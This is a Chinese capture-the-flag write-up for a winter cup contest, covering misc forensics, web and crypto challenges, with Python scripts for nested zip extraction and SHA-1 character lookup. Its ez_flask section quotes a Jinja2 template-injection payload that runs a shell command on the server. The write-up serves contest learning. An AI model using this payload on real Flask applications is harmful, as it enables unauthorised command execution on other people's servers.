2025i春秋冬季杯

Misc

See anything in these pics?

最开始Aztec码解密得到5FIVE

用来去解压缩包

之后得到一张图片

010查看末尾多出来一张图片,手动分离

拖入随波逐流即可得到

image-20250117172217382

简单镜像提取

流量包中看到一个压缩包,原始数据提出来得到

image-20250117172353579

还原为压缩包

image-20250117172419231

得到一个镜象,根据题目描述RR_studio

想到RStudio

用RStudio打开恢复数据找到flag

image-20250117172648100

压力大,写个脚本吧

压缩包里给的密码base64解密后即为压缩包Mima

写个脚本批量解压,后面得到hint,提示password+password.png

把密码拼起来得到一张图片

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
import zipfile
import os
import base64
import re


def decode_password_from_file(filepath):
    """解码Base64格式的密码文件并返回密码字符串"""
    try:
        with open(filepath, 'r') as file:
            encoded_password = file.read().strip()
            decoded_password = base64.b64decode(encoded_password).decode()
            return decoded_password
    except Exception as err:
        print(f"密码解码失败: {err}")
        return None


def decompress_zip(zip_file, password):
    """解压指定的ZIP文件并返回下一个可能的ZIP文件路径"""
    folder = os.path.dirname(zip_file)

    try:
        with zipfile.ZipFile(zip_file) as archive:
            archive.extractall(path=folder, pwd=password.encode())
            files_in_zip = archive.namelist()

        # 查找解压出来的zip文件
        next_zip = next((os.path.join(folder, f) for f in files_in_zip if f.endswith('.zip')), None)
        return next_zip
    except Exception as err:
        print(f"解压过程中出现错误: {err}")
        return None


def retrieve_passwords(starting_zip):
    """从起始ZIP文件开始,递归收集所有密码"""
    current_zip = starting_zip
    gathered_passwords = []
    processed_files = set()

    while current_zip and os.path.exists(current_zip):
        if current_zip in processed_files:
            print(f"警告: 检测到重复的ZIP文件 {current_zip},停止处理")
            break

        processed_files.add(current_zip)
        # 从文件名提取数字
        zip_number = re.search(r'(\d+)', os.path.basename(current_zip)).group(1)
        password_filename = f'password_{zip_number}.txt'

        if not os.path.exists(password_filename):
            print(f"未找到密码文件: {password_filename},停止处理")
            break

        print(f"处理ZIP文件: {current_zip}")
        print(f"使用密码文件: {password_filename}")

        password = decode_password_from_file(password_filename)
        if password:
            gathered_passwords.append(password)
            print(f"解码的密码: {password}")

            next_zip = decompress_zip(current_zip, password)
            if next_zip:
                print(f"发现新的ZIP文件: {next_zip}")
                current_zip = next_zip
            else:
                print("没有找到更多的ZIP文件,解压结束")
                break
        else:
            break

    return gathered_passwords


def sanitize_password(password):
    """移除密码中的非十六进制字符"""
    return ''.join([char for char in password if char in '0123456789ABCDEFabcdef'])


def generate_png_from_passwords(passwords, output_filename="flag.png"):
    """根据密码列表生成PNG文件"""
    passwords.reverse()  # 反转密码列表以合并

    hex_data = ''
    print("\n清理密码并拼接:")
    for pwd in passwords:
        sanitized = sanitize_password(pwd)
        hex_data += sanitized

    print(f"\n拼接后的十六进制数据:")
    print(hex_data)  # 打印十六进制数据

    print(f"最终的十六进制数据长度: {len(hex_data)}")

    try:
        if len(hex_data) % 2 != 0:
            hex_data = hex_data[:-1]

        binary_data = bytes.fromhex(hex_data)
        with open(output_filename, "wb") as file:
            file.write(binary_data)

        print(f"PNG文件生成成功: {output_filename}")
        return True
    except Exception as err:
        print(f"创建PNG时出错: {err}")
        return False


def execute():
    """主程序:解压ZIP文件、收集密码并生成PNG文件"""
    initial_zip = "zip_99.zip"
    print(f"开始处理ZIP文件: {initial_zip}")

    passwords = retrieve_passwords(initial_zip)
    if passwords:
        print("\n生成PNG文件中...")
        if generate_png_from_passwords(passwords):
            print("\n处理完毕!请检查生成的flag.png文件")
        else:
            print("\nPNG文件生成失败!")
    else:
        print("\n没有收集到密码,处理失败。")


if __name__ == "__main__":
    execute()

Web

file copy

工具秒了

da110b8bdbcb670ee3b4c3fe8591d45d

ez_flask

fenjing就可以

payload

1
{{cycler.next.__globals__.__builtins__.__import__('os').popen('cat flag').read()}}

Crypto

你是小哈斯?

给了sha1的加密表

挨个解密会发现规律

写个脚本对应起来

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
import hashlib
import string

# 获取所有键盘上的字符,包括字母、数字和常见符号
keyboard_chars = string.ascii_letters + string.digits + string.punctuation + string.whitespace

# 提供的SHA-1哈希值列表
hash_list = [
    "356a192b7913b04c54574d18c28d46e6395428ab","da4b9237bacccdf19c0760cab7aec4a8359010b0","77de68daecd823babbb58edb1c8e14d7106e83bb","1b6453892473a467d07372d45eb05abc2031647a","ac3478d69a3c81fa62e60f5c3696165a4e5e6ac4","c1dfd96eea8cc2b62785275bca38ac261256e278","902ba3cda1883801594b6e1b452790cc53948fda","fe5dbbcea5ce7e2988b8c69bcfdfde8904aabc1f","0ade7c2cf97f75d009975f4d720d1fa6c19f4897","b6589fc6ab0dc82cf12099d1c2d40ab994e8410c","3bc15c8aae3e4124dd409035f32ea2fd6835efc9","21606782c65e44cac7afbb90977d8b6f82140e76","22ea1c649c82946aa6e479e1ffd321e4a318b1b0","aff024fe4ab0fece4091de044c58c9ae4233383a","58e6b3a414a1e090dfc6029add0f3555ccba127f","4dc7c9ec434ed06502767136789763ec11d2c4b7","8efd86fb78a56a5145ed7739dcb00c78581c5375","95cb0bfd2977c761298d9624e4b4d4c72a39974a","51e69892ab49df85c6230ccc57f8e1d1606caccc","042dc4512fa3d391c5170cf3aa61e6a638f84342","7a81af3e591ac713f81ea1efe93dcf36157d8376","516b9783fca517eecbd1d064da2d165310b19759","4a0a19218e082a343a1b17e5333409af9d98f0f5","07c342be6e560e7f43842e2e21b774e61d85f047","86f7e437faa5a7fce15d1ddcb9eaeaea377667b8","54fd1711209fb1c0781092374132c66e79e2241b","60ba4b2daa4ed4d070fec06687e249e0e6f9ee45","d1854cae891ec7b29161ccaf79a24b00c274bdaa","7a81af3e591ac713f81ea1efe93dcf36157d8376","53a0acfad59379b3e050338bf9f23cfc172ee787","042dc4512fa3d391c5170cf3aa61e6a638f84342","a0f1490a20d0211c997b44bc357e1972deab8ae3","53a0acfad59379b3e050338bf9f23cfc172ee787","4a0a19218e082a343a1b17e5333409af9d98f0f5","07c342be6e560e7f43842e2e21b774e61d85f047","86f7e437faa5a7fce15d1ddcb9eaeaea377667b8","54fd1711209fb1c0781092374132c66e79e2241b","c2b7df6201fdd3362399091f0a29550df3505b6a","86f7e437faa5a7fce15d1ddcb9eaeaea377667b8","a0f1490a20d0211c997b44bc357e1972deab8ae3","3c363836cf4e16666669a25da280a1865c2d2874","4a0a19218e082a343a1b17e5333409af9d98f0f5","54fd1711209fb1c0781092374132c66e79e2241b","27d5482eebd075de44389774fce28c69f45c8a75","5c2dd944dde9e08881bef0894fe7b22a5c9c4b06","13fbd79c3d390e5d6585a21e11ff5ec1970cff0c","07c342be6e560e7f43842e2e21b774e61d85f047","395df8f7c51f007019cb30201c49e884b46b92fa","11f6ad8ec52a2984abaafd7c3b516503785c2072","84a516841ba77a5b4648de2cd0dfcb30ea46dbb4","7a38d8cbd20d9932ba948efaa364bb62651d5ad4","e9d71f5ee7c92d6dc9e92ffdad17b8bd49418f98","d1854cae891ec7b29161ccaf79a24b00c274bdaa","6b0d31c0d563223024da45691584643ac78c96e8","5c10b5b2cd673a0616d529aa5234b12ee7153808","4a0a19218e082a343a1b17e5333409af9d98f0f5","07c342be6e560e7f43842e2e21b774e61d85f047","86f7e437faa5a7fce15d1ddcb9eaeaea377667b8","54fd1711209fb1c0781092374132c66e79e2241b","60ba4b2daa4ed4d070fec06687e249e0e6f9ee45","54fd1711209fb1c0781092374132c66e79e2241b","86f7e437faa5a7fce15d1ddcb9eaeaea377667b8","6b0d31c0d563223024da45691584643ac78c96e8","58e6b3a414a1e090dfc6029add0f3555ccba127f","53a0acfad59379b3e050338bf9f23cfc172ee787","84a516841ba77a5b4648de2cd0dfcb30ea46dbb4","22ea1c649c82946aa6e479e1ffd321e4a318b1b0","e9d71f5ee7c92d6dc9e92ffdad17b8bd49418f98","53a0acfad59379b3e050338bf9f23cfc172ee787","042dc4512fa3d391c5170cf3aa61e6a638f84342","a0f1490a20d0211c997b44bc357e1972deab8ae3","042dc4512fa3d391c5170cf3aa61e6a638f84342","a0f1490a20d0211c997b44bc357e1972deab8ae3","53a0acfad59379b3e050338bf9f23cfc172ee787","84a516841ba77a5b4648de2cd0dfcb30ea46dbb4","11f6ad8ec52a2984abaafd7c3b516503785c2072","95cb0bfd2977c761298d9624e4b4d4c72a39974a","395df8f7c51f007019cb30201c49e884b46b92fa","c2b7df6201fdd3362399091f0a29550df3505b6a","3a52ce780950d4d969792a2559cd519d7ee8c727","86f7e437faa5a7fce15d1ddcb9eaeaea377667b8","a0f1490a20d0211c997b44bc357e1972deab8ae3","3c363836cf4e16666669a25da280a1865c2d2874","4a0a19218e082a343a1b17e5333409af9d98f0f5","54fd1711209fb1c0781092374132c66e79e2241b","27d5482eebd075de44389774fce28c69f45c8a75","5c2dd944dde9e08881bef0894fe7b22a5c9c4b06","13fbd79c3d390e5d6585a21e11ff5ec1970cff0c","07c342be6e560e7f43842e2e21b774e61d85f047","395df8f7c51f007019cb30201c49e884b46b92fa","11f6ad8ec52a2984abaafd7c3b516503785c2072","84a516841ba77a5b4648de2cd0dfcb30ea46dbb4","7a38d8cbd20d9932ba948efaa364bb62651d5ad4","e9d71f5ee7c92d6dc9e92ffdad17b8bd49418f98","d1854cae891ec7b29161ccaf79a24b00c274bdaa","6b0d31c0d563223024da45691584643ac78c96e8","5c10b5b2cd673a0616d529aa5234b12ee7153808","3a52ce780950d4d969792a2559cd519d7ee8c727","22ea1c649c82946aa6e479e1ffd321e4a318b1b0","aff024fe4ab0fece4091de044c58c9ae4233383a","58e6b3a414a1e090dfc6029add0f3555ccba127f","4dc7c9ec434ed06502767136789763ec11d2c4b7","8efd86fb78a56a5145ed7739dcb00c78581c5375","95cb0bfd2977c761298d9624e4b4d4c72a39974a","51e69892ab49df85c6230ccc57f8e1d1606caccc","042dc4512fa3d391c5170cf3aa61e6a638f84342","7a81af3e591ac713f81ea1efe93dcf36157d8376","516b9783fca517eecbd1d064da2d165310b19759","4a0a19218e082a343a1b17e5333409af9d98f0f5","07c342be6e560e7f43842e2e21b774e61d85f047","86f7e437faa5a7fce15d1ddcb9eaeaea377667b8","54fd1711209fb1c0781092374132c66e79e2241b","60ba4b2daa4ed4d070fec06687e249e0e6f9ee45","d1854cae891ec7b29161ccaf79a24b00c274bdaa","7a81af3e591ac713f81ea1efe93dcf36157d8376","53a0acfad59379b3e050338bf9f23cfc172ee787","042dc4512fa3d391c5170cf3aa61e6a638f84342","a0f1490a20d0211c997b44bc357e1972deab8ae3","53a0acfad59379b3e050338bf9f23cfc172ee787","4a0a19218e082a343a1b17e5333409af9d98f0f5","07c342be6e560e7f43842e2e21b774e61d85f047","86f7e437faa5a7fce15d1ddcb9eaeaea377667b8","54fd1711209fb1c0781092374132c66e79e2241b","c2b7df6201fdd3362399091f0a29550df3505b6a","356a192b7913b04c54574d18c28d46e6395428ab","da4b9237bacccdf19c0760cab7aec4a8359010b0","77de68daecd823babbb58edb1c8e14d7106e83bb","1b6453892473a467d07372d45eb05abc2031647a","ac3478d69a3c81fa62e60f5c3696165a4e5e6ac4","c1dfd96eea8cc2b62785275bca38ac261256e278","902ba3cda1883801594b6e1b452790cc53948fda","fe5dbbcea5ce7e2988b8c69bcfdfde8904aabc1f","0ade7c2cf97f75d009975f4d720d1fa6c19f4897","b6589fc6ab0dc82cf12099d1c2d40ab994e8410c","3bc15c8aae3e4124dd409035f32ea2fd6835efc9","21606782c65e44cac7afbb90977d8b6f82140e76"]

sha1_dict = {}

# 对每个字符进行SHA-1加密并存储到字典
for char in keyboard_chars:
    sha1_hash = hashlib.sha1(char.encode()).hexdigest()
    sha1_dict[sha1_hash] = char

# 存储所有找到的字符
matched_chars = []

# 匹配哈希值并输出对应的字符
for sha1_hash in hash_list:
    if sha1_hash in sha1_dict:
        matched_chars.append(sha1_dict[sha1_hash])
    else:
        matched_chars.append('?')  # 如果找不到对应字符,使用问号表示

# 将所有匹配的字符组合成一个字符串
result_string = ''.join(matched_chars)

print("Matched characters:", result_string)

image-20250117171807678

flag:flag{game_cqb_isis_cxyz}

通往哈希的旅程

ca12fd8250972ec363a16593356abb1f3cf3a16d

cmd5解密即可得到18876011645